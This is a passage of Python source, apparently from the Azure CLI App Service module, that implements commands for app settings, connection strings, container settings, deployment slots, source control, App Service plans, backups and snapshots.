client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
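# Returns the SSL context used for urlopen: very old Pythons, and Cloud Shell on Windows, get a bare
# SSLContext (presumably because default certificate verification is unreliable there); everything else
# uses the default verified context.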
def _ssl_context():
    import platform
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must specify both --multicontainer-config-file FILE and --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # logic here is ported from the portal
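    # ASE-hosted apps: prefer the ILB internal address, then an IP-based SSL virtual IP, then the ASE
    # service address. Apps on the multi-tenant infrastructure are resolved through DNS on the default hostname.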
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
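# Configures Kudu source control integration for the app. A GitHub token, when supplied, is first registered
# with the App Service 'GitHub' source control provider; the site-level source control is then created with
# retries, since a recent SCM site restart can cause transient 50x failures.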
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (anything other than 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update the source control token cached in Azure App Service. If no token is provided,
    the command clears the existing token.
    '''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
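    # Zone redundancy is not yet exposed on the SDK model, so it is injected through additional_properties.
    # A zone redundant plan needs at least three workers, hence the capacity floor of 3.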
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise ArgumentUsageError('Windows containers are not yet supported in App Service Environments')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
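# Parses a backup frequency string such as '7d' or '12h' into (interval, FrequencyUnit), e.g. '7d' -> (7, FrequencyUnit.day).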
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
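# Builds the local git remote URL, typically 'https://{publishing_user}@{app}.scm.azurewebsites.net/{app}.git'.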
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
    Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
